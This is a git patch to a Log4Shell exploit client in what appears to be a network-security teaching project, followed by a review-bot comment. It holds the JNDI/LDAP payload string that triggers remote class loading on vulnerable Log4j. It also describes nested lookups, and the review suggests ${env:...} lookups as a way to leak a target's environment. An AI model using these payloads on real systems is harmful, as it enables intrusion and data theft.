From 811f716da18f9e2a47dd1bbe5c642d7eaf933383 Mon Sep 17 00:00:00 2001 From: Lukas Arnold <lukas.arnold@stud.tu-darmstadt.de> Date: Wed, 22 Jun 2022 17:23:18 +0200 Subject: [PATCH] Adds more details about the string sent by the exploit --- .../src/main/java/de/seemoo/netsec/Log4ShellClient.java | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java b/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java index b432113..4cbf8b6 100644 --- a/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java +++ b/exploit/src/main/java/de/seemoo/netsec/Log4ShellClient.java @@ -23,8 +23,15 @@ public class Log4ShellClient { // Sends the malicious message to trigger the remote code execution. // The message references to the LDAP server simultaneously running on port 389. - // Vulnerable Log4J version will contact it and download malicious class files. + // A vulnerable Log4J version will contact it and download malicious class files. // It is important to put any string after the last slash, otherwise the attack won't work. + + // Furthermore, it is also possible to replace 'anytext' with even more lookups. + // They will be evaluated before the request is sent to the LDAP server. + // Henceforth, one can send the string '${jndi:ldap://127.0.0.1:389/${java:version}}' which first + // evaluates the Java version and then sends the LDAP request. + // See: https://logging.apache.org/log4j/2.x/manual/lookups.html + writer.println("${jndi:ldap://127.0.0.1:389/anytext}"); writer.close(); -- GitLab
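Review bot: The new comment on `${jndi:ldap://127.0.0.1:389/${java:version}}` leaves out the security point it touches — the inner lookup is expanded by the vulnerable host's Log4j before the LDAP request is sent (as the comment itself says), so the URL path becomes a data-exfiltration channel for the target, presumably independent of whether the later class download succeeds. I would add after the `See:` line: `// Note: the inner lookup is resolved on the TARGET, so e.g. ${env:...} or ${sys:...} would leak that host's environment/system properties in the LDAP request path.` The phrase `which first evaluates the Java version` should also say whose Java version (the target's), and `Henceforth` reads as `Hence` here. The enclosing method starts before this hunk, so where `writer` is created and whether it is closed on an exception path is not visible from here.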